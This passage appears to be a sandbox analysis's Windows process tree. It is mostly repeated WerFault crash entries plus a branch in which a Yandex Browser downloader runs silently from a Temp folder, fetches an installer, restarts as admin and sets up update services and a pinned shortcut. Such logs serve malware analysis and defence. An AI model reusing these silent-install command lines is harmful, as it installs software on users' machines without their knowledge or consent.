                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5472
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2644 -ip 2644
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:8752
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2644 -ip 2644
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:10676
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2644 -ip 2644
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:7160
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2644 -ip 2644
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:8944
                                                                                                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                                                                                                      werfault.exe /h /shared Global\7dfb9f6fbb5346edb17c70c6cab68f6a /t 10188 /p 6936
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:11376
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2644 -ip 2644
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:11556
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 2644 -ip 2644
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:12952
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 2644 -ip 2644
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:12756
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 2644 -ip 2644
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:11564
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2644 -ip 2644
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:10704
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 2644 -ip 2644
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:11852
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2644 -ip 2644
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:11176
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 2644 -ip 2644
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:11924
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 2644 -ip 2644
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:11784
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2644 -ip 2644
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:11088
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 2644 -ip 2644
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:1912
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 2644 -ip 2644
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:7492
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\{35666959-9227-4535-8980-D9AB7FCFC9D2}.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\{35666959-9227-4535-8980-D9AB7FCFC9D2}.exe" --job-name=yBrowserDownloader-{9F0E203D-5916-473B-897B-A5ACB66B9AED} --send-statistics --local-path=C:\Users\Admin\AppData\Local\Temp\{35666959-9227-4535-8980-D9AB7FCFC9D2}.exe --YABROWSER --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={44bcdb30-2396-4f24-ba3a-a0a6d6243612} --use-user-default-locale
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:11816
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ybB8B7.tmp
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\ybB8B7.tmp" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\8aa00bc6-4f09-4f2e-9a57-de0270341235.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=615782002 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{9F0E203D-5916-473B-897B-A5ACB66B9AED} --local-path="C:\Users\Admin\AppData\Local\Temp\{35666959-9227-4535-8980-D9AB7FCFC9D2}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={44bcdb30-2396-4f24-ba3a-a0a6d6243612} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\41e47965-48b8-47fe-920d-ae197fc6ff4b.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1932
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\YB_90D45.tmp\setup.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\YB_90D45.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_90D45.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\8aa00bc6-4f09-4f2e-9a57-de0270341235.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=615782002 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{9F0E203D-5916-473B-897B-A5ACB66B9AED} --local-path="C:\Users\Admin\AppData\Local\Temp\{35666959-9227-4535-8980-D9AB7FCFC9D2}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={44bcdb30-2396-4f24-ba3a-a0a6d6243612} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\41e47965-48b8-47fe-920d-ae197fc6ff4b.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:10008
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\YB_90D45.tmp\setup.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\YB_90D45.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_90D45.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\8aa00bc6-4f09-4f2e-9a57-de0270341235.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=615782002 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{9F0E203D-5916-473B-897B-A5ACB66B9AED} --local-path="C:\Users\Admin\AppData\Local\Temp\{35666959-9227-4535-8980-D9AB7FCFC9D2}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={44bcdb30-2396-4f24-ba3a-a0a6d6243612} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\41e47965-48b8-47fe-920d-ae197fc6ff4b.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico" --verbose-logging --run-as-admin --target-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application" --child-setup-process --restart-as-admin-time=648354008
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • System Time Discovery
                                                                                                                                                                                                                            PID:10120
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\YB_90D45.tmp\setup.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\YB_90D45.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=10120 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x340,0x344,0x348,0x31c,0x34c,0x122cbe8,0x122cbf4,0x122cc00
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:11612
                                                                                                                                                                                                                              • C:\Windows\TEMP\sdwra_10120_1000671439\service_update.exe
                                                                                                                                                                                                                                "C:\Windows\TEMP\sdwra_10120_1000671439\service_update.exe" --setup
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:6044
                                                                                                                                                                                                                                  • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --install
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:11572
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:5664
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\pin\explorer.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent /pin-path="C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.lnk" --is-pinning
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:4464
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\source10120_1214308750\Browser-bin\clids_yandex.xml"
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:3464
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 2644 -ip 2644
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:6752
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2644 -ip 2644
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4296
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2644 -ip 2644
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:9444
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2644 -ip 2644
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:7000
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2644 -ip 2644
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:7020
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2644 -ip 2644
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:6348
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2644 -ip 2644
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:10384
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2644 -ip 2644
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:6344
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2644 -ip 2644
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:4960
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2644 -ip 2644
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:9836
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2644 -ip 2644
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:7608
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:2912
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2644 -ip 2644
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:8668
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2644 -ip 2644
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:13232
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2644 -ip 2644
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:11248
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6672
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5880
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:5316
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:928
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:11200
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:5220
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:10536
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:9140
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:10416
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:8588
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:9276
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:12564
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:12832
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:12184
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:8088
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:8616
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:7864
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:5328
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:11384
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:1328
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:8188
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:9772
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:10620
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:8412
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:180
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:6784
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:1332
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:9608
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:7016
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:10908
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:3480
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:4280
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:8536
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:7876
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:6376
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:8736
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2644 -ip 2644
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:8976
                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --run-as-service
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:8200
                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=8200 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x104e784,0x104e790,0x104e79c
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:7704
                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --update-scheduler
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:8312
                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --update-background-scheduler
                                                                                                                                                                                                                                                                                                                                                    3⤵
